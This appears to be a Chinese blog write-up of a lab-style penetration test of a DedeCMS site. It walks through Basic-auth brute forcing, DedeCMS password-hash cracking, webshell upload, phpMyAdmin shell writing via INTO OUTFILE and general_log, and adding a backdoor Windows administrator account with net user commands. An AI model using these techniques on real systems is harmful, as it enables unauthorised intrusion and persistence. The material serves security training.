DEDECMS-案例分析
创始人
2024-09-26 09:53:35
0

DEDECMS-案例分析

1、信息采集

通过Wappalyzer获取CMS、操作系统、编程语言和数据库管理器等信息

image-20240806163507969

御剑目录扫描

image-20240806164239090

并未扫描到任何信息,大概率是认证问题

image-20240806164358033

输入账号密码抓个包看看

image-20240806163451912

image-20240806164615648

Basic认证
Basic认证过程简单介绍

浏览器请求一个需要认证的网页。
服务器向浏览器返回“401 Unauthorized(未认证)”状态码。
浏览器收到此状态码后,询问用户名和密码。
浏览器发送附带认证信息(Authorization头信息)的请求。
本次请求得到了文档(用户名密码均正确的情况下) 。

其中YWRtaW46MTIzusername:password(admin:123)经过base64加密得到的结果

2、弱口令爆破

这里就要尝试一些fuzz爆破

playload格式 用户名字典+ :+密码字典,对有效载荷处理添加base64编码

image-20240806165655516

image-20240806165710661

可以看到一个200响应,base64解码后得到账号密码

image-20240806165903464

image-20240806170001786

登陆得到key1

image-20240806170028433

目录扫描可以用BP抓包,加上御剑的字典爆破

注意一定不要选择有效载荷编码

image-20240806170645031

将结果保存为txt文档

image-20240806170953220

进入key.txt,得到key2

image-20240806171101946

前面信息采集的时候就已经知道了数据库管理器是phpMyAdmin

image-20240806171343107

还是尝试一下fuzz爆破,通过弱口令检查工具得到数据库用户名和密码,所以说这个admin就是一个干扰选项

image-20240806174002178

进入数据库后台后找到admin的密码,到这一部的时候就又要用我们前面的信息,CMS是DedeCMS,那么就有个特点,dede 的密码怎么破解,dede后台。32位的DEDE密码如何破解

dede 的密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5。
比如我的数据库的密文是:cca77804d2ba1922c33e

得到20 MD5密码,方法是,前减3后减1,得到16位MD5

这样执行后就是77804d2ba1922c33

直接md5解密:888888

image-20240806174224105

image-20240806175047530

可以正常进入后台

image-20240806180028172

文件上传 getshell

在后台上传一个png类型文件,写入马,改后缀

image-20240806191010689

在附件数据管理中找到上传文件路径

image-20240806191319223

可以正常执行,蚁剑添加Authorized头部可以正常连接

image-20240806191239112

image-20240806191449174

phpMyAdmin get shell

参考文章:https://xz.aliyun.com/t/3283

(1) 直接写shell

前提三个条件:对web目录具有写入条件(dba用户)、知道网站的路径(探针phpinfo、报错、目录扫描等等)、secure_file_pri要具有导出权限,需要为空或者具体的一个web路径

查询secure_file_priv的值,当前为空

select @@secure_file_priv; show GLOBAL VARIABLES like '%secure_file%'; 

image-20240806200041169

查找路径

SELECT @@basedir; 

image-20240806200111959

SELECT '' INTO OUTFILE 'C:/phpStudy/MySQL/xiaodisec.php'; 

在蚁剑上可以看到已经上传了,知道路径就可以利用(可以根据MYSQL路径猜网站根目录,后面说)

image-20240806201209175

(2) 日志文件写shell

因为在mysql5.0以上,mysql官方把secure_file_pri参数默认设为NULL,所以无法进行导入导出,mysql有日志功能可以优化SQL语句

  1. 查询mysql日志功能是否开启
SHOW VARIABLES LIKE '%general%' 

General_log 表示日志功能是否打开

General_log_file 代表日志存储的位置

image-20240806180718588

  1. 修改日志功能开头以及日志位置
SET GLOBAL general_log = on; SET GLOBAL general_log_file='C:/phpStudy/MySQL/xiaodisec.php'; SELECT ''; 

image-20240806203348715

  1. 根据前面查到的日志路径可以判断,这个网站是小皮搭建的,大差不差就能猜到网站路径
C:/phpStudy/www SET GLOBAL general_log_file='C:/phpStudy/www/xiaodisec.php' 

image-20240806204150113

image-20240806204332153

image-20240806204426234

远程连接

先用nmap查看是否开启远程连接

nmap -p 3389 10.0.0.163 

image-20240806190449206

在御剑命令行中能看到当前为管理员用户

image-20240806193526086

但是很明显账号不匹配(与admin,888888)这个数据库后台管理员

net user xiaodi 123456 /add net localgroup administrators xiaodi /add net localgroup administrators 

image-20240806193837422

添加管理员用户成功

image-20240806194221144

远程连接失败的原因

远程桌面失败也有很多其他原因,例如: 1.攻击机与目标机是否连通,ping命令即可验证。 2.目标机器是否开启了远程桌面服务 3.kali中/etc/ssh/sshd_config文件,X11 forwarding 是否设置为 yes? 4.也有博主说kali默认安装的rdesktop容易出现问题,卸载,重装。apt-get remove/install rdesktop 两条命令即可! 

相关内容

热门资讯

安卓系统为什么不封闭,揭秘安卓... 你有没有想过,为什么安卓系统那么开放,却不像苹果iOS那样封闭呢?这背后可是有着不少有趣的故事和原因...
安卓系统更新包多大,解析不同版... 你有没有发现,每次安卓系统更新,手机里都会多出那么几个G的文件?这可真是让人好奇,安卓系统更新包究竟...
安卓手机安装双系统吗,安卓手机... 你有没有想过,你的安卓手机是不是也能像电脑一样,装上两个系统,一个用来工作,一个用来娱乐?没错,这就...
oppo会升级安卓系统,畅享最... 你知道吗?最近有个大消息在手机圈里炸开了锅,那就是OPPO要升级安卓系统啦!这可不是什么小打小闹的更...
安卓系统上安装windows,... 你有没有想过,在安卓手机上安装Windows系统?听起来是不是有点不可思议?但你知道吗,这竟然是可能...
安卓系统怎么进运行框,安卓系统... 你有没有想过,你的安卓手机里有一个超级实用的功能,那就是运行框!它就像是一个小助手,帮你快速找到正在...
安卓系统电视无图像设置,安卓电... 你家的安卓系统电视突然没图像了?别急,让我来给你支个招,让你轻松解决这个问题!一、检查电源和连接线首...
安卓机建议升级系统吗,提升性能 你有没有发现,你的安卓手机最近有点儿慢吞吞的?是不是在犹豫要不要升级系统呢?别急,让我来给你好好分析...
升级不了安卓系统升级,探寻升级... 你有没有遇到过这种情况?手机里的安卓系统突然告诉你,它需要升级,但你左等右等,就是升不上去。这可真是...
备用安卓系统手机推荐,盘点热门... 你有没有想过,如果你的手机突然罢工了,你会怎么办?别担心,今天我就要给你安利几款备用安卓系统手机,让...
旧安卓系统ipad无法更新系统... 你有没有遇到过这种情况?你的旧安卓系统iPad突然告诉你,它无法更新系统了!是不是瞬间感觉心里有点小...
运行安卓6系统命令大全,全面掌... 你有没有想过,你的安卓手机里隐藏着无数强大的功能,只等着你去发现和探索呢?今天,就让我带你走进安卓6...
安卓系统简笔画教程下载,轻松绘... 你有没有想过,用简单的线条就能把复杂的安卓系统画出来?没错,就是那种一看就懂,一画就上手的感觉!今天...
华为如何鸿蒙转安卓系统,轻松实... 你知道吗?最近华为的大动作可是让整个科技圈都沸腾了!他们竟然把鸿蒙系统转到了安卓系统上,这可真是让人...
安卓10系统的问题,安卓10系... 你有没有发现,自从你的手机升级到安卓10系统后,好像有点不对劲呢?别急,让我来给你细细道来,看看安卓...
安卓系统苹果搞笑视频,苹果搞笑... 你知道吗?在互联网的世界里,搞笑视频可是个永恒的热门话题。尤其是那些结合了安卓系统和苹果手机的搞笑片...
卡片机改造安卓系统,探索改造之... 你有没有想过,那些曾经陪伴我们记录美好时光的卡片机,现在竟然也能焕发第二春呢?没错,就是那些小巧便携...
装安卓系统倒车出不来,智能科技... 你有没有遇到过这样的事情:手机装了个安卓系统,结果倒车的时候出不来啦?这可不是闹着玩的,简直让人抓狂...
定制安卓系统哪家好点儿,哪家服... 你有没有想过,手机系统就像是个人的衣服,每个人都需要找到最适合自己的那一款?今天,咱们就来聊聊定制安...
台电用回安卓系统吗,开启智能新... 最近有个话题在科技圈里炒得挺热的,那就是台电是不是要用回安卓系统了?你有没有想过,这个小小的决定背后...